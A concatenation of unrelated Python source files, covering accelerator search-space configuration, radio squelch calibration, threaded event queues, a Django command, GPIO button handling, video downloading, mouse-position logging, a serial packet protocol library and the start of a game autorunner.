acc1_space={'comp_mode':[0,1,2],'trbuff':[28,14,7,2,1],'tcbuff':[28,14,7,2,1],'tmbuff':[16,8,4,2,1],'tnbuff':[16,8,4,2,1], 'tr':[28,14,7,2,1],'tc':[28,14,7,2,1],'tm':[16,8,4,2,1],'tn':[16,8,4,2,1]}
acc2_space={'comp_mode':[0,1,2],'trbuff':[7,2,1],'tcbuff':[7,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[7,2,1],'tc':[7,2,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
dw_acc1_space={'comp_mode':[0,1],'trbuff':[28,14,7,2,1],'tcbuff':[28,14,7,2,1],'tmbuff':[16,8,4,2,1],'tnbuff':[1], 'tr':[28,14,7,2,1],'tc':[28,14,7,2,1],'tm':[16,8,4,2,1],'tn':[1]}
dw_acc2_space={'comp_mode':[0,1],'trbuff':[7,2,1],'tcbuff':[7,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[7,2,1],'tc':[7,2,1],'tm':[32,16,8,4,2,1],'tn':[1]}
return (acc1_space,acc2_space,dw_acc1_space,dw_acc2_space)
else:
if cifar:
acc1_space={'comp_mode':[0,1,2],'trbuff':[32,16,8,4,2,1],'tcbuff':[32,16,8,4,2,1],'tmbuff':[8,4,2,1],'tnbuff':[8,4,2,1], 'tr':[32,16,8,4,2,1],'tc':[32,16,8,4,2,1],'tm':[8,4,2,1],'tn':[8,4,2,1]}
acc2_space={'comp_mode':[0,1,2],'trbuff':[16,8,4,2,1],'tcbuff':[16,8,4,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[16,8,4,2,1],'tc':[16,8,4,2,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
acc3_space={'comp_mode':[0,1,2],'trbuff':[8,4,2,1],'tcbuff':[8,4,2,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[64,32,16,8,4,2,1], 'tr':[8,4,2,1],'tc':[8,4,2,1],'tm':[64,32,16,8,4,2,1],'tn':[64,32,16,8,4,2,1]}
acc4_space={'comp_mode':[0,1,2],'trbuff':[8,4,2,1],'tcbuff':[8,4,2,1],'tmbuff':[112,56,28,14,7,1],'tnbuff':[112,56,28,14,7,1], 'tr':[8,4,2,1],'tc':[8,4,2,1],'tm':[112,56,28,14,7,1],'tn':[112,56,28,14,7,1]}
acc5_space={'comp_mode':[0,1,2],'trbuff':[4,2,1],'tcbuff':[4,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[4,2,1],'tc':[4,2,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
dw_acc1_space={'comp_mode':[0,1],'trbuff':[32,16,8,4,2,1],'tcbuff':[32,16,8,4,2,1],'tmbuff':[8,4,2,1],'tnbuff':[1], 'tr':[32,16,8,4,2,1],'tc':[32,16,8,4,2,1],'tm':[8,4,2,1],'tn':[1]}
dw_acc2_space={'comp_mode':[0,1],'trbuff':[16,8,4,2,1],'tcbuff':[16,8,4,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[16,8,4,2,1],'tc':[16,8,4,2,1],'tm':[32,16,8,4,2,1],'tn':[1]}
dw_acc3_space={'comp_mode':[0,1],'trbuff':[8,4,2,1],'tcbuff':[8,4,2,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[1], 'tr':[8,4,2,1],'tc':[8,4,2,1],'tm':[64,32,16,8,4,2,1],'tn':[1]}
dw_acc4_space={'comp_mode':[0,1],'trbuff':[8,4,2,1],'tcbuff':[8,4,2,1],'tmbuff':[112,56,28,14,7,1],'tnbuff':[1], 'tr':[8,4,2,1],'tc':[8,4,2,1],'tm':[112,56,28,14,7,1],'tn':[1]}
dw_acc5_space={'comp_mode':[0,1],'trbuff':[4,2,1],'tcbuff':[4,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[4,2,1],'tc':[4,2,1],'tm':[32,16,8,4,2,1],'tn':[1]}
return (acc1_space,acc2_space,acc3_space,acc4_space,acc5_space,dw_acc1_space,dw_acc2_space,dw_acc3_space,dw_acc4_space,dw_acc5_space)
else:
acc1_space={'comp_mode':[0,1,2],'trbuff':[56,28,14,7,1],'tcbuff':[56,28,14,7,1],'tmbuff':[8,4,2,1],'tnbuff':[8,4,2,1], 'tr':[56,28,14,7,1],'tc':[56,28,14,7,1],'tm':[8,4,2,1],'tn':[8,4,2,1]}
acc2_space={'comp_mode':[0,1,2],'trbuff':[28,14,7,1],'tcbuff':[28,14,7,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[28,14,7,1],'tc':[28,14,7,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
acc3_space={'comp_mode':[0,1,2],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[64,32,16,8,4,2,1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[64,32,16,8,4,2,1],'tn':[64,32,16,8,4,2,1]}
acc4_space={'comp_mode':[0,1,2],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[112,56,28,14,7,1],'tnbuff':[112,56,28,14,7,1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[112,56,28,14,7,1],'tn':[112,56,28,14,7,1]}
acc5_space={'comp_mode':[0,1,2],'trbuff':[7,1],'tcbuff':[7,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[7,1],'tc':[7,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
dw_acc1_space={'comp_mode':[0,1],'trbuff':[56,28,14,7,1],'tcbuff':[56,28,14,7,1],'tmbuff':[8,4,2,1],'tnbuff':[1], 'tr':[56,28,14,7,1],'tc':[56,28,14,7,1],'tm':[8,4,2,1],'tn':[1]}
dw_acc2_space={'comp_mode':[0,1],'trbuff':[28,14,7,1],'tcbuff':[28,14,7,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[28,14,7,1],'tc':[28,14,7,1],'tm':[32,16,8,4,2,1],'tn':[1]}
dw_acc3_space={'comp_mode':[0,1],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[64,32,16,8,4,2,1],'tn':[1]}
dw_acc4_space={'comp_mode':[0,1],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[112,56,28,14,7,1],'tnbuff':[1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[112,56,28,14,7,1],'tn':[1]}
dw_acc5_space={'comp_mode':[0,1],'trbuff':[7,1],'tcbuff':[7,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[7,1],'tc':[7,1],'tm':[32,16,8,4,2,1],'tn':[1]}
return (acc1_space,acc2_space,acc3_space,acc4_space,acc5_space,dw_acc1_space,dw_acc2_space,dw_acc3_space,dw_acc4_space,dw_acc5_space)
if edd:
acc1_space={'comp_mode':[0,1,2],'trbuff':[28,14,7,1],'tcbuff':[28,14,7,1],'tmbuff':[16,8,4,2,1],'tnbuff':[16,8,4,2,1], 'tr':[28,14,7,1],'tc':[28,14,7,1],'tm':[16,8,4,2,1],'tn':[16,8,4,2,1]}
acc2_space={'comp_mode':[0,1,2],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[96,48,24,12,8,4,3,2,1],'tnbuff':[96,48,24,12,8,4,3,2,1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[96,48,24,12,8,4,3,2,1],'tn':[96,48,24,12,8,4,3,2,1]}
acc3_space={'comp_mode':[0,1,2],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[128,64,32,16,8,4,2,1],'tnbuff':[128,64,32,16,8,4,2,1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[128,64,32,16,8,4,2,1],'tn':[128,64,32,16,8,4,2,1]}
#acc3_space={'comp_mode':[0,1,2],'trbuff':[7,1],'tcbuff':[7,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[64,32,16,8,4,2,1], 'tr':[7,1],'tc':[7,1],'tm':[64,32,16,8,4,2,1],'tn':[64,32,16,8,4,2,1]}
acc4_space={'comp_mode':[0,1,2],'trbuff':[7,1],'tcbuff':[7,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[64,32,16,8,4,2,1], 'tr':[7,1],'tc':[7,1],'tm':[64,32,16,8,4,2,1],'tn':[64,32,16,8,4,2,1]}
dw_acc1_space={'comp_mode':[0,1],'trbuff':[28,14,7,1],'tcbuff':[28,14,7,1],'tmbuff':[16,8,4,2,1],'tnbuff':[1], 'tr':[28,14,7,1],'tc':[28,14,7,1],'tm':[16,8,4,2,1],'tn':[1]}
dw_acc2_space={'comp_mode':[0,1],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[96,48,24,12,8,4,3,2,1],'tnbuff':[1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[96,48,24,12,8,4,3,2,1],'tn':[1]}
dw_acc3_space={'comp_mode':[0,1],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[128,64,32,16,8,4,2,1],'tnbuff':[1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[128,64,32,16,8,4,2,1],'tn':[1]}
dw_acc4_space={'comp_mode':[0,1],'trbuff':[7,1],'tcbuff':[7,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[1], 'tr':[7,1],'tc':[7,1],'tm':[64,32,16,8,4,2,1],'tn':[1]}
return (acc1_space,acc2_space,acc3_space,acc4_space,dw_acc1_space,dw_acc2_space,dw_acc3_space,dw_acc4_space)
def random_sample(input_dict):
np.random.seed()
result_sample=[]
result_sample_dict={}
for key in input_dict.keys():
tmp=input_dict[key][np.random.randint(len(input_dict[key]))]
if "tr"== key or "tc"==key or "tm" == key or "tn" ==key :
#tmp=np.random.randint(len(input_dict[key]))
while tmp > result_sample_dict[key+"buff"]:
tmp=input_dict[key][np.random.randint(len(input_dict[key]))]
result_sample.append(tmp)
result_sample_dict[key]=tmp
else:
result_sample.append(tmp)
result_sample_dict[key]=tmp
return result_sample
def mac_calc(net_struct):
mac=0
for i, layer in enumerate(net_struct):
mac+=layer[0]*layer[1]*layer[2]*layer[2]*layer[3]*layer[3]
return mac
|
set-squelch.py
|
#!/bin/python
"""Sets the squelch level."""
import subprocess
import threading
import time
import io
def bytes_at_squelch_level(squelch_level):
"""Returns the number of bytes received at a squelch level."""
# Python 3
if hasattr(subprocess, 'DEVNULL'):
devnull = subprocess.DEVNULL
else:
# Python 2 :(
devnull = open('/dev/null', 'w')
p1 = subprocess.Popen(
(
'rtl_fm',
'-f',
'144.390M',
'-s',
'22050',
'-l',
str(squelch_level),
'-'
),
stdout=subprocess.PIPE,
stderr=devnull
)
p2 = subprocess.Popen(('wc', '-c'), stdin=p1.stdout, stdout=subprocess.PIPE)
def sleep_then_kill_p1():
time.sleep(2.0)
p1.kill()
threading.Thread(target=sleep_then_kill_p1).start()
bytes_count = int(p2.communicate()[0])
if isinstance(devnull, io.IOBase):
devnull.close()
return bytes_count
def find_squelch_level() -> int:
"""Finds the squelch level."""
def squelched(limit: int) -> bool:
"""Returns true if it was squelched."""
print(f"Trying {limit}")
bytes_count = bytes_at_squelch_level(upper_limit)
print(f'Squelch level {limit} produced {bytes_count} bytes')
if bytes_count < 10000:
return True
return False
# Binary search up!
lower_limit = 10
upper_limit = 20
for i in range(15):
if squelched(upper_limit):
break
time.sleep(1)
lower_limit = upper_limit
upper_limit = int(upper_limit * 1.5)
while lower_limit + 1 <= upper_limit:
mid = (lower_limit + upper_limit) // 2
if squelched(mid):
upper_limit = mid
else:
lower_limit = mid + 1
return mid
def main():
"""Main."""
level = find_squelch_level() + 10
print('Setting squelch level to {}'.format(level))
with open('squelch-level.txt', 'w') as file_:
file_.write('{}'.format(level))
if __name__ == '__main__':
main()
|
handler.py
|
import logging
import time
from abc import ABCMeta
from collections import defaultdict
from Queue import Queue
from threading import Lock, Thread
from __main__ import config
from ..types import ActiveHunter, Hunter
from ...core.events.types import HuntFinished
import threading
global queue_lock
queue_lock = Lock()
# Inherits Queue object, handles events asynchronously
class EventQueue(Queue, object):
def __init__(self, num_worker=10):
super(EventQueue, self).__init__()
self.passive_hunters = dict()
self.active_hunters = dict()
self.hooks = defaultdict(list)
self.running = True
self.workers = list()
for i in range(num_worker):
t = Thread(target=self.worker)
t.daemon = True
t.start()
self.workers.append(t)
t = Thread(target=self.notifier)
t.daemon = True
t.start()
# decorator wrapping for easy subscription
def subscribe(self, event, hook=None, predicate=None):
def wrapper(hook):
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# getting uninstantiated event object
def subscribe_event(self, event, hook=None, predicate=None):
if ActiveHunter in hook.__mro__:
if not config.active:
return
else:
self.active_hunters[hook] = hook.__doc__
elif Hunter in hook.__mro__:
self.passive_hunters[hook] = hook.__doc__
if hook not in self.hooks[event]:
self.hooks[event].append((hook, predicate))
logging.debug('{} subscribed to {}'.format(hook, event))
# getting instantiated event object
def publish_event(self, event, caller=None):
logging.debug('Event {} got published with {}'.format(event.__class__, event))
for hooked_event in self.hooks.keys():
if hooked_event in event.__class__.__mro__:
for hook, predicate in self.hooks[hooked_event]:
if predicate and not predicate(event):
continue
if caller:
event.previous = caller.event
self.put(hook(event))
# executes callbacks on dedicated thread as a daemon
def worker(self):
while self.running:
queue_lock.acquire()
hook = self.get()
queue_lock.release()
try:
hook.execute()
except Exception as ex:
logging.debug(ex.message)
self.task_done()
logging.debug("closing thread...")
def notifier(self):
time.sleep(2)
while self.unfinished_tasks > 0:
logging.debug("{} tasks left".format(self.unfinished_tasks))
time.sleep(3)
# stops execution of all daemons
def free(self):
self.running = False
with self.mutex:
self.queue.clear()
handler = EventQueue(800)
|
update_number_of_words.py
|
# -*- encoding: utf-8 -*-
from queue import Queue, Empty
from threading import Thread
from django.core.management.base import BaseCommand
from ...models import TransTask
from ...utils import get_num_words
class Command(BaseCommand):
help = "Update the number of words to translate in every task"
queue = Queue()
num_threads = 80
threads = []
def handle(self, *args, **options):
self.queue = Queue()
self.stdout.write('Reading tasks...')
for it in TransTask.objects.all():
self.queue.put({'id': it.id, 'num': get_num_words(it.object_field_value)})
for i in range(self.num_threads):
t = Thread(target=self.worker_elements)
t.start()
self.threads.append(t)
self.stdout.write("Waiting for empty queue")
self.queue.join()
self.stop_threads()
def stop_threads(self):
for t in self.threads:
t.join()
self.stdout.write('Exiting main thread')
def worker_elements(self):
while not self.queue.empty():
try:
item = self.queue.get(timeout=2)
TransTask.objects.filter(pk=item['id']).update(number_of_words=item['num'])
except Empty:
break
finally:
self.queue.task_done()
|
buttontest(v1).py
|
from gpiozero import Button
from time import sleep
import tkinter as tk
from threading import Thread
button17 = Button("GPIO17")
button22 = Button("GPIO22")
button23 = Button("GPIO23")
button27 = Button("GPIO27")
class buttonpush():
def __init__(self):
#Thread.__init__(self)
self.b = False
def checkloop(self):
while True:
if button17.is_pressed:
if self.b == False:
self.b = True
print("pressed")
root.destroy()
else:
self.b = False
print("off")
while button17.is_pressed: pass
#if button22.is_pressed:
# print("button23 pressed")
#if button23.is_pressed:
# print("button23 pressed")
#if button27.is_pressed:
# print("button27 pressed")
print("before root")
root = tk.Tk()
print("before class made")
button17class = buttonpush()
print("before thread")
check17 = Thread(target=button17class.checkloop)
print("before start")
check17.start()
print("before mainloop")
root.mainloop()
|
utils.py
|
import threading
from playhouse.shortcuts import model_to_dict
from bilibili_api import Bilibili
from model import Video, PlayList
def models_to_dict(models):
return [model_to_dict(orm) for orm in models]
def thead(video_id):
client = Bilibili()
client.download_by_id(video_id)
Video.update(is_completed=True).where(Video.id == video_id).execute()
def thread_download(video_id):
n = threading.Thread(target=thead, args=(video_id,))
n.start()
return "ok"
def thead_list(play_list_id):
play = PlayList.get_by_id(play_list_id)
while True:
first_video = play.videos\
.where(Video.is_progress == 0) \
.where(Video.is_completed == 0) \
.first()
if first_video is None:
break
updated = Video.update(is_progress=1) \
.where(Video.is_progress == 0) \
.where(Video.id == first_video.id).execute()
if updated == 1:
client = Bilibili()
client.download_by_id(first_video.id)
Video.update(is_completed=True).where(Video.id == first_video.id).execute()
def thread_download_list(play_list_id):
for i in range(1, 5):
n = threading.Thread(target=thead_list, args=(play_list_id,))
n.start()
return "ok"
|
mouse.py
|
from threading import Thread
from time import time, sleep
# Создаем контроллер мыши
from pynput.mouse import Controller
from . import BaseModule
mouse = Controller()
class MouseModule(BaseModule):
move_events = list()
def __init__(self):
super().__init__(name='mouse', source=100)
# Создаем поток для трекинга передвижений мыши
# передаем в функцию массив передвижений
clicks_thread = Thread(target=move_event, args=(self.events,))
clicks_thread.start()
def move_event(key_events):
while True:
values = mouse.position
# Если данные такие-же добавляем только один блок данных
if (len(key_events) > 0 and key_events[-1]['x'] != values[0] and key_events[-1]['y'] != values[1]) or len(
key_events) == 0:
key_events.append(dict(x=values[0], y=values[1], time=time()))
sleep(1)
|
core.py
|
"""
Simple package for receiving and sending data over serial. Data is framed in packets:
|START|LEN|ID|... PAYLOAD BYTES ...|CRC|END|
Each packet has:
id: 0-255 identifier byte
payload: any data bytes
Packets are received and sent using two threads handling the serial port.
Callback targeting specific packet ids are supported. Packets that have a callback assigned are not placed in the
read queue!
"""
from queue import Queue, Full, Empty
from serial import Serial, SerialException
from threading import Thread, Lock
import struct
from time import sleep, time
import crcmod
import logging
def bytes2str(b):
if not isinstance(b, (bytes, bytearray)):
raise TypeError("b must be bytes or bytearray instance.")
if isinstance(b, bytearray):
b = bytes(b)
return b.decode("UTF-8")
def str2bytes(s):
if not isinstance(s, str):
raise TypeError("s must be string instance.")
return s.encode("UTF-8")
def bytes2int(b):
if not isinstance(b, (bytes, bytearray)):
raise TypeError("b must be bytes or bytearray instance.")
if isinstance(b, bytearray):
b = bytes(b)
return int.from_bytes(b, byteorder="little", signed=True)
def int2bytes(i):
"""
Convert int to bytes.
:param i: 32 bit integer inside range -2147483648, 2147483647
:return: 4 bytes
"""
if not isinstance(i, int):
raise TypeError("i must be int")
return struct.pack("i", i)
def bytes2float(b):
if not isinstance(b, (bytes, bytearray)):
raise TypeError("b must be bytes or bytearray instance.")
if isinstance(b, bytearray):
b = bytes(b)
return struct.unpack("f", b)[0]
def float2bytes(f):
"""
Convert float to bytes.
:param f: float
:return: 4 bytes
"""
if isinstance(f, int):
f = float(f)
elif not isinstance(f, float):
raise TypeError("f must be float")
b = struct.pack("f", f)
return b
class SimpleSerialException(Exception):
pass
class FrameError(SimpleSerialException):
""" Raised when received frame is invalid. """
pass
class ReplyTimeout(SimpleSerialException):
""" Raised when reply is not received in time. """
pass
class CRCError(SimpleSerialException):
""" Raised when CRC does not match. """
pass
class SimpleSerial:
"""
Create simple_serial_python object.
"""
def __init__(self, port=None, baud=None, serial=None, start=0x02, end=0x03, esc=0x01, payload_max_len=8,
packet_timeout=1.0, queue_max_len=100, **kwargs):
"""
:param port: serial port
:param baud: baud rate
:param serial: serial instance, must not be opened
:param start: start byte flag value
:param end: end byte flag value
:param esc: esc byte flag value
:param payload_max_len: maximum payload length in bytes
:param packet_timeout: time passed after start when packed is discarded
:param queue_max_len: maximum receive, send, callback queue length
:param args: args passed to Serial
:param kwargs: kwargs passed to Serial
"""
# set up serial port
if not serial and port and baud:
self.serial = Serial(baudrate=baud, timeout=1e-1, *kwargs)
self.serial.port = port
elif serial and not port and not baud:
self.serial = serial
else:
raise ValueError("Please set 'port' and 'baud', or set 'serial'.")
self.serial_alive = False
self.received_queue = Queue(maxsize=queue_max_len)
self.send_queue = Queue(maxsize=queue_max_len)
self.byte_count = 0
self.current_id = None
self.current_len = None
self.current_payload = None
self.esc_active = False
self.START = start
self.END = end
self.ESC = esc
self.payload_max_len = payload_max_len
self.packet_timeout = packet_timeout
self.receive_thread = None
self.send_thread = None
self.callback_thread = None
self.lock = Lock()
self.callbacks = {}
""" A dict of set callbacks {id: callback function}"""
self.callback_queue = Queue(maxsize=queue_max_len)
self.awaiting_reply = {}
""" A dict of sent packets, waiting for reply {id: (sent_time, frame, nr_send_tries_left, replied payload)}"""
self.packet_start_time = 0.
self.is_open = False
self.logger = logging.getLogger("SimpleSerial({})".format(self.serial.port))
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close(wait_send=False)
def open(self):
"""
Open serial communication, start receive/send/callback threads.
"""
self.is_open = True
self.serial.open()
self.serial_alive = True
self.receive_thread = Thread(target=self.receive_worker, daemon=True)
self.send_thread = Thread(target=self.send_worker, daemon=True)
self.callback_thread = Thread(target=self.callback_worker, daemon=True)
self.receive_thread.start()
self.send_thread.start()
self.callback_thread.start()
self.logger.debug("Open")
def close(self, wait_send=True):
"""
Close serial communication, stop threads.
:param wait_send: True to wait until all pending messages are sent.
"""
if wait_send:
while self.send_queue.qsize() > 0:
sleep(1/1000)
self.is_open = False
self.receive_thread.join()
self.send_thread.join()
self.callback_thread.join()
self.serial.close()
self.serial_alive = False
self.logger.debug("Closed")
def send(self, id, payload, expect_reply=False, block_until_reply=False, reply_timeout=1.0, resend=0):
"""
Convert payload to bytes from int/float/string and puts it to send queue.
Ignores packet if send queue is full.
:param id: packet id
:param payload: bytes, int, float, str
:param expect_reply: Set True for packets that trigger a reply. When this is True, received packets with same
id are not placed in receive queue. To read reply use block_until_reply or register a callback.
:param block_until_reply: True to block until reply received and return received (id, payload)
:param reply_timeout: time to wait for reply, it expect_reply is True
:param resend: if expect_reply is True, number of send retries if reply is not received.
Total number of tries is 1 + retry
"""
# Check id
if not isinstance(id, int) or not 0 <= id <= 255:
raise ValueError("id must be int in range [0, 255]. Currently: {}".format(id))
# Check type
if isinstance(payload, bytes):
pass
elif isinstance(payload, int):
payload = int2bytes(payload)
elif isinstance(payload, float):
payload = float2bytes(payload)
elif isinstance(payload, str):
payload = str2bytes(payload)
else:
raise TypeError("Payload is type '{}'. Must be bytes/int/float/string.".format(type(payload)))
# Check length
if len(payload) > self.payload_max_len:
raise ValueError("Payload (len={}) must not be longer than payload_max_len={}."
.format(len(payload), self.payload_max_len))
frame = self.frame(id, payload)
try:
self.send_queue.put((id, frame), block=False)
except Full:
self.logger.debug("Send queue full, packet id {} discarded".format(id))
# Schedule resending and wait reply
if expect_reply:
self.awaiting_reply[id] = [time(), reply_timeout, frame, resend, None]
if block_until_reply:
# wait for reply and return replied payload
while True :
try:
reply = self.awaiting_reply[id][4]
except KeyError:
raise ReplyTimeout
else:
if reply:
return reply
sleep(1e-3)
def read(self, block=True, timeout=None):
"""
Return item from received packets queue.
:param block: true to block until packet available
:param timeout: if none, blocks indefinitely, otherwise Empty exception is raised if no packet available
after timeout seconds
:return tuple: id, payload
"""
return self.received_queue.get(block, timeout)
def escape(self, data):
"""
Escapes data with ESC byte.
:param data: data to escape. type: bytes or bytearray
:return: escaped bytearray
"""
escaped = bytearray()
for b in data:
if b not in [self.START, self.END, self.ESC]:
escaped.append(b)
else:
escaped.append(self.ESC)
escaped.append(b)
return escaped
def unescape(self, data):
"""
Remove escape bytes from data
:param data: data to remove escapes from, type: bytes or bytearray
:return: bytearray
"""
unescaped = bytearray()
esc = False
for b in data:
if not esc:
if b != self.ESC:
unescaped.append(b)
else:
esc = True
continue
else:
unescaped.append(b)
esc = False
return unescaped
def frame(self, id, payload):
"""
Frame payload data. Insert START, END and ESC bytes, length and id.
:param id: packet id
:param payload: data to frame, type bytes or bytearray
:return: framed data
"""
payload = bytearray(payload)
# Extend payload with calculated CRC
payload.extend(self.calc_crc(payload))
packet = bytearray()
packet.append(self.START) # start byte
packet.append(0) # length byte placeholder
packet.append(id) # id byte
packet += self.escape(payload) # escaped payload
packet.append(self.END) # end byte
packet[1] = len(packet) # set length byte to length of whole frame
return packet
def unframe(self, packet):
"""
Un-frame data. Remove flag bytes
Raises FrameError if frame is invalid.
:param packet: framed data
:return: dict with keys: length, id, payload
"""
if packet[0] != self.START:
raise FrameError("START byte missing.")
if packet[-1] != self.END:
raise FrameError("END byte missing.")
length = packet[1]
if length != len(packet):
raise FrameError("Length mismatch.")
id = packet[2]
payload = self.unescape(packet[3:-1])
# Extract and verify CRC
crc = payload.pop(-1)
crc_calc = self.calc_crc(payload)[0]
if crc != crc_calc:
raise CRCError("CRC mismatch")
return {"len": length, "id": id, "payload": payload}
@staticmethod
def calc_crc(bts):
"""
Calculate CRC-8 value of input bytes.
:param bts: sequence of bytes, type bytes or bytearray
:return: single byte CRC-8, type bytes
"""
crc8 = crcmod.predefined.Crc("crc-8")
crc8.update(bts)
return crc8.digest()
def read_packet(self, b):
"""
Read packet byte by byte. Called when new byte is available.
:param b: incoming byte
"""
if len(b) < 1:
return
if self.byte_count > 0 and time() - self.packet_start_time > self.packet_timeout:
self.byte_count = 0
self.esc_active = False
return
b = b[0]
# Wait for START
if self.byte_count == 0:
if b == self.START:
self.current_len = None
self.current_id = None
self.current_payload = bytearray()
self.byte_count += 1
self.packet_start_time = time()
# Length byte
elif self.byte_count == 1:
self.current_len = b
self.byte_count += 1
# Id byte
elif self.byte_count == 2:
self.current_id = b
self.byte_count += 1
# Payload bytes
elif self.byte_count >= 3:
if not self.esc_active:
if b == self.ESC:
self.esc_active = True
self.byte_count += 1
return
if b == self.END:
self.byte_count += 1
# End of frame, verify
crc_received = bytes([self.current_payload[-1]])
payload = self.current_payload[0:-1]
crc_calculated = self.calc_crc(payload)
if self.current_len == self.byte_count and crc_received == crc_calculated:
callback_processed = self.process_callback(self.current_id, payload)
reply_processed = self.process_reply(self.current_id, payload)
if not callback_processed and not reply_processed:
try:
self.received_queue.put((self.current_id, payload), block=False)
except Full:
pass
else:
pass
self.byte_count = 0
return
else:
self.current_payload.append(b)
self.byte_count += 1
else:
self.current_payload.append(b)
self.byte_count += 1
self.esc_active = False
if self.byte_count > self.current_len or time() - self.packet_start_time > self.packet_timeout:
# Reset
self.byte_count = 0
self.esc_active = False
def receive_worker(self):
"""
Receive worker function. Reads serial port byte by byte.
"""
while self.is_open:
if self.serial_alive:
try:
b = self.serial.read() # blocks until a byte is available or timeout set in serial constructor
except SerialException:
self.serial_alive = False
self.restart()
else:
self.read_packet(b)
self.update_awaiting_reply()
def send_worker(self):
"""
Send worker function. Takes frame from send queue and sends it over serial.
"""
while self.is_open:
if self.serial_alive:
try:
id, frame = self.send_queue.get(block=True, timeout=1e-1)
except Empty:
pass
else:
try:
self.serial.write(frame)
except SerialException:
self.serial_alive = False
self.restart()
def restart(self):
"""
Close and reopen the serial port.
"""
self.logger.warning("Serial port closed unexpectedly. Trying to reopen...")
while self.is_open:
try:
self.serial.close()
self.serial.open()
except SerialException:
pass
else:
self.serial_alive = True
self.logger.warning("Reopened serial port.")
break
sleep(1)
def set_callback(self, id, callback):
"""
Set a function to be called when a packet with certain id is received.
Arguments passed to callback function: payload
:param id: packet id
:param callback: function to call
"""
self.callbacks[id] = callback
def clear_callback(self, id):
"""
Remove callback function at certain message id.
:param id: packet id
"""
self.callbacks.pop(id, None)
def process_callback(self, id, payload):
"""
Called when new packet is received.
Check if callback for packet id is set. If true, put the callback function in callback queue.
:param id: packed id
:param payload: packet payload
:return True if callback is registered, False otherwise
"""
try:
cb = self.callbacks[id]
except KeyError:
return False
else:
try:
self.callback_queue.put((cb, payload), block=False)
except Full:
pass
return True
def callback_worker(self):
"""
Call functions from callback queue. Pass packet id, len, payload as arguments.
"""
while self.is_open:
try:
callback, payload = self.callback_queue.get(block=True, timeout=1e-1)
except Empty:
pass
else:
try:
callback(payload)
except Exception as e:
self.logger.error("Exception occurred during callback '{}': {}".format(callback.__name__, e))
def update_awaiting_reply(self):
"""
Update the list of sent packets waiting for reply
"""
items_to_pop = []
for id, (time_sent, timeout, frame, tries_left, replied) in self.awaiting_reply.items():
if not replied:
if time() - time_sent > timeout:
if tries_left <= 0:
items_to_pop.append(id)
self.logger.warning("Reply for packet id {} not received.".format(id))
else:
try:
self.send_queue.put((id, frame), block=False)
except Full:
pass
else:
self.awaiting_reply[id] = [time(), timeout, frame, tries_left - 1, replied]
for i in items_to_pop:
self.awaiting_reply.pop(i)
def process_reply(self, id, payload):
try:
self.awaiting_reply[id][4] = payload
except KeyError:
return False
else:
return True
|
autorunner.py
|
import random
from multiprocessing import Process
from parser import drawState, from_python
from states import State, JoinResult
from orbiter import OrbiterStrategy
from swarmer import SwarmerStrategy
from interaction import send2
from orbit_util import sign, trace_orbit
_, [p1, p2] = send2([1, 0])
def survivor_strategy(state):
pid = state[2][1]
actions = []
my_ships = []
enemy_ships = []
for obj in state[3][2]:
if obj[0][0] == pid:
print(obj)
my_ships.append(obj)
else:
enemy_ships.append(obj)
for my_ship in my_ships:
my_pos = my_ship[0][2]
thrust = (-sign(my_pos[0]), 0) if abs(my_pos[0]) > abs(my_pos[1]) else (0, -sign(my_pos[1]))
actions.append([0, my_ship[0][1], thrust])
if enemy_ships:
enemy_ship = random.choice(enemy_ships)
enemy_pos = enemy_ship[0][2]
enemy_speed = enemy_ship[0][3]
actions.append([2, my_ship[0][1], (enemy_pos[0] + enemy_speed[0], enemy_pos[1] + enemy_speed[1]), 5])
return actions
def id_strategy(state):
print('= ID STRATEGY =')
State.parse(state)
print('===============')
return []
def die_strategy(state):
print('=====HANG======')
st = State.parse(state)
ship = st.player_ships(st.me)[0]
print('===============')
return [ship.do_explode()]
def move_towards(x, vx, tx):
"""
x - where we are; vx - our speed; tx - where we want to be.
Returns optimal do_thrust power.
Speeds up only if we can later stop without overshoooting.
